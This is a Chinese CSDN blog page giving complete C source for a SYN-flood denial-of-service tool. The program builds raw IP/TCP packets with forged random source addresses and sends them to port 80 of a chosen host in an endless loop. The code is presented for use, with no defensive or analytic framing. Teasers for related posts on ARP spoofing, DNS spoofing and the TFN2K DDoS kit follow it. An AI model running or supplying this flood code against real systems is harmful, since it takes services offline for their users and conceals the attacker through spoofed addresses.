Linux网络欺骗,Linux下网络攻击DDos的实现代码,tcp数据欺骗的实现

最新推荐文章于 2021-12-13 16:31:26 发布
最新推荐文章于 2021-12-13 16:31:26 发布
阅读量138 收藏
点赞数
文章标签: Linux网络欺骗

TCP/IP 原始套接字 校验和 IP包填充 C语言编程
关键词由CSDN通过智能技术生成

/*

注意:

这次主要改了函数send_tcp里的代码,旧的代码在填充ip包时有问题。

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define SRCPORT 1234

#define DSTPORT 80

struct prseuheader

{

unsigned long s_addr;

unsigned long d_addr;

unsigned char zero;

unsigned char prototp;

unsigned short len;

};

void send_tcp(int sockfd, struct sockaddr_in *addr);

unsigned short check_sum(unsigned short *addr, int len);

int main(int argc, char **argv)

{

int sockfd;

struct sockaddr_in addr;

struct hostent *host;

int on = 1;

if (argc != 2) {

fprintf(stderr, "Usage:%s hostname/n/a", argv[0]);

exit(1);

}

bzero(&addr, sizeof(struct sockaddr_in));

addr.sin_family = AF_INET;

addr.sin_port = htons(SRCPORT);

if (inet_aton(argv[1], &addr.sin_addr) == 0) {

host = gethostbyname(argv[1]);

if (host == NULL) {

fprintf(stderr, "HostName Error:%s/n/a", hstrerror(h_errno));

exit(1);

}

addr.sin_addr = *(struct in_addr *) (host->h_addr_list[0]);

}

//创建一个TCP的原始套接字

sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);

if (sockfd < 0) {

fprintf(stderr, "Socket Error:%s/n/a", strerror(errno));

exit(1);

}

//设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写

setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));

//只用超级护用户才可以使用原始套接字

setuid(getpid());

send_tcp(sockfd, &addr);

return 0;

}

void send_tcp(int sockfd, struct sockaddr_in *addr)

{

while (1)

{

char buffer[100];

char tcpbuff[32];

struct ip *ip;

struct tcphdr *tcp;

struct prseuheader theheader;

int head_len;

head_len = sizeof(struct ip) + sizeof(struct tcphdr);

memset((void*)buffer,'/0',100) ;

//填充IP数据包头

ip = (struct ip *) buffer;

ip->ip_v = IPVERSION;

ip->ip_hl = sizeof(struct ip) >> 2;

ip->ip_tos = 0;

ip->ip_len = htons(head_len);

ip->ip_id = 0;

ip->ip_off = 0;

ip->ip_ttl = MAXTTL;

ip->ip_p = IPPROTO_TCP;

//校验和让系统去做

ip->ip_sum = 0;

ip->ip_dst = addr->sin_addr;

//开始填写TCP数据包

tcp = (struct tcphdr *) (buffer + sizeof(struct ip));

tcp->source = addr->sin_port;

tcp->dest = htons(DSTPORT);

tcp->ack_seq = 0;

tcp->doff = 5;

//syn置位

tcp->syn = 1;

tcp->check = 0;

tcp->seq = random();

//随机生成源地址

ip->ip_src.s_addr = random();

//填充伪头部

theheader.s_addr = ip->ip_src.s_addr;

theheader.d_addr = ip->ip_dst.s_addr;

theheader.zero = 0;

theheader.prototp = IPPROTO_TCP;

theheader.len = htons(20);

memset((void*)tcpbuff,'/0',32);

memcpy(tcpbuff,&theheader,12);

memcpy(tcpbuff+12,tcp,20);

//注意:tcp的校验和必须计算伪头部

tcp->check = check_sum((unsigned short *) tcpbuff, 32);

sendto(sockfd, buffer, head_len, 0, addr, sizeof(struct sockaddr_in));

usleep(1);

}

}

unsigned short check_sum(unsigned short *buffer, int size)

{

unsigned long cksum = 0;

while(size>1)

{

cksum += *buffer++;

size -= sizeof(unsigned short);

}

if(size)

{

cksum += *(unsigned char*)buffer;

}

cksum = (cksum>>16) + (cksum&0xffff); //将高16bit与低16bit相加

cksum += (cksum>>16); //将进位到高位的16bit与低16bit 再相加

return (unsigned short)(~cksum);}

weixin_39534149
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux下原始socket实现ARP局域网欺骗工具
08-23
linux下原始socket实现ARP局域网欺骗工具
Linux网络攻击DDos实现代码tcp数据欺骗实现
seven407的专栏
12-01 1199
/*注意:这次主要改了函数send_tcp里的代码,旧的代码在填充ip包时有问题。*/#include #include #include #include #include #include #include #include #include #define SRCPORT 1234#define DSTPORT 80 struct prseuheader{unsigned lo
linux实现局域网IP欺骗dns域名解析
热门推荐
guojunfenglinux的博客
06-04 1万+
大家可以到我git托管平台clone一份测测看,本人程序小白,有问题欢迎指出,共同进步。https://github.com/guojunfengcode/udp_raw_socket.git 1.简单的讲一下IP欺骗。 目的是往A发包,一般本应在包里面填充自己的ip地址,在这把ip地址设为B的地址,让A误以为是B地址发的请求包,所以A响应response的时候是往B发包。这就是ip欺骗,主动让A跟B相互联系。 2.那域名解析呢? 只要向网关或都域名服务器的53端口发送一个DNS查询报文,就可以收到服务
linux ddos源码,Linux实现DDOS攻击的方法
weixin_42143221的博客
05-13 672
软件用的是最有名的DDOS,首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的REDHAT Linux进行测试,本次攻击测试我使用的是FEDORA CORE3。开始设置服务器:解压 tar -zxvf tfn2k.tgz1.安装TFN2KTFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的Linux需要不...
Linux攻防(三)——python实现DDOS攻击
帅帅气气的黑猫警长
03-05 925
首先说一下dos和ddos的区别: DoS:是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。 DDOS:分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对...
TCP-IP详解卷二:实现
03-23
9. **网络安全**:TCP/IP实现中涉及的安全问题,如防止DDoS攻击、保护数据的加密传输等也是本书可能涵盖的内容。TCP的SYN洪水攻击、IP欺骗等问题及相应的防御策略值得深入研究。 10. **实际案例分析**:作者可能会...
网络协议分析》-实训报告2022.docx
03-03
1. 连通性检查:在进行任何网络攻击或防御前,首先要确保网络连接正常。这里通过`ipconfig`(Windows)和`ifconfig`(Kali Linux)命令检查两台虚拟机的IP配置,确保它们可以互相通信,并通过`ping`命令验证网络连通...
Web渗透-网络安全面试 面试宝典 2023最新版65页超全解析.pdf
最新发布
10-16
7. **社工与APT**:社会工程学利用人类行为获取信息,APT(高级持续性威胁)是一种长期、隐蔽的网络攻击方式。 8. **应急响应**:当系统被攻破时,需要快速响应,包括隔离受影响的部分、恢复系统、追踪攻击者等。 ...
计量自动化终端拒绝服务网络攻击仿真研究.pdf
09-17
由于成本因素,电力信息网通常依赖第三方运营商,这使得它们容易遭受网络攻击,如拒绝服务(Denial of Service, DoS)攻击、IP地址欺骗和协议漏洞利用等。 计量终端的网络安全风险主要体现在以下几个方面: 1. **...
网络安全思维导图
01-09
DDoS攻击及对策.jpg Linux检查脚本.jpeg SAE运维体系.jpg SIEM系统的结构图.jpg TCP:IP参考模型的安全协议分层.jpg TCP:IP参考模型的安全服务与安全机制.jpg WPDRRC模型.jpg 业务运维.jpg 信息安全.jpg ...
Linux防火墙中的IP地址欺骗问题基本防范
weixin_33922672的博客
04-26 892
通常遇到一些在设定防火墙规则时,经常忽略掉IP欺骗***的问题,什么是IP欺骗呢﹖首先请教您一个问题,如果图中防火墙的规则为iptables -A FORWARD -i eth0 -p all -s 192.168.1.10 -j DROP,请问***在192.168.1.10主机上,能不能将***封包送到192.168.2.50这部主机上﹖ 以上这个问题是肯定...
ddos攻击工具_linuxDDoS攻击模拟实战
weixin_39595271的博客
11-24 5187
前言:电影院如期开放,据前线消息,人实在是少,有些场次一个人看一场,在华夏有电影院开始,应该都少有这种场景吧,再次希望疫情早日散去,在此引用一句话来配合一次图:“直到乌云散去风雨落幕,我们一起走向未来。”一,什么是DDoS攻击分布式拒绝服务攻击(英文意思是Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击,或...
linux 实现ddos
weixin_34336526的博客
11-28 1725
分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在Inte...
基于Kali Linux实现ARP欺骗、嗅探、DNS欺骗、DOS攻击
Deng's Blog
07-22 9161
本文主要介绍基于Kali Linux实现arp欺骗、嗅探、dns欺骗、DOS攻击。
深入理解socket网络编程
lyz_lucky的博客
09-06 663
1.1 客户端程式和服务端程式 网络程式和普通的程式有一个最大的差别是网络程式是由两个部分组成的--客户端和服务器端. 网络程式是先有服务器程式启动,等待客户端的程式运行并建立连接.一般的来说是服务端的程式在一个端口上监听,直到有一个客户端的程式发来了请求. 1.2 常用的命令 由于网络程式是有两个部分组成,所以在调试的时候比较麻烦,为此我们有必要知道一些常用的网络命令 netsta
使用Kali Linux ARP欺骗实现局域网断网攻击
guyu的博客
10-15 5314
Kali Linux ARP欺骗攻击局域网 首先 什么是ARP欺骗?   ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。最早探讨ARP欺骗的文章是由Yuri V
Linux原始网络编程,Linux操作系统网络编程--原始套接字 (1)
weixin_39686192的博客
05-10 49
原始套接字我们在前面已经学习过了网络程序的两种套接字(SOCK_STREAM,SOCK_DRAGM).在这一章 里面我们一起来学习另外一种套接字--原始套接字(SOCK_RAW)。应用原始套接字,我们可以编写出由TCP和UDP套接字不能够实现的功能. 注意原始套接字只能够由有root权限的人创建。原始套接字的创建int sockfd(AF_INET,SOCK_RAW,protocol)可以创建一个...
Kali Linux | 史上最详细的局域网ARP欺骗教程(附图)
m0_65129142的博客
12-13 3570
首先向大家做一个自我介绍,我是FInternet一个不知名团队的团长,这是我入驻FreeBuf的第5天。这篇文章是我发布的第一篇文章,如果说文章中间存在标点符号或者文字的错误,可以在评论区指正,我也会及时回复的! 话不多说,我们开干! 首先打开kali的终端(废话) 我们要对该目标发动攻击肯定需要了解的以下信息:局域网的网关,本机ipv4的地址,目标机的ipv4地址。 先说说怎么知道局域网关: 如上图,输入route -n即可,我们看到gateway那一竖拍中192.168.1.1就是我们要找的网关了。 接
使用LINUX系统DDOS攻击WINDOWS服务器
rubilly的专栏
10-09 1841
使用当下最有名的REDHAT LINUX进 行测试,本次攻击测试我使用的是FEDORA CORE3 ,软件用的是最有名的DDOS攻击工具 TFN2K LINUX版,被攻击的WINDOWS服务器系统使用的是WINDOWS2000 SERVER 服务开有APACHE2 FTP VNC关系不大,主要攻击APACHE 0.解压 tar -zxvf tfn2k.tgz 1.安装TFN2K TFN2K为开放原
Kali Linux网络扫描实战指南
这本书旨在帮助读者掌握网络扫描的各种技术和工具,包括起步、探索扫描、端口扫描、指纹识别、漏洞扫描、拒绝服务攻击、Web应用扫描以及如何自动化Kali Linux工具。书中提供了详细的步骤和实践练习,适合网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值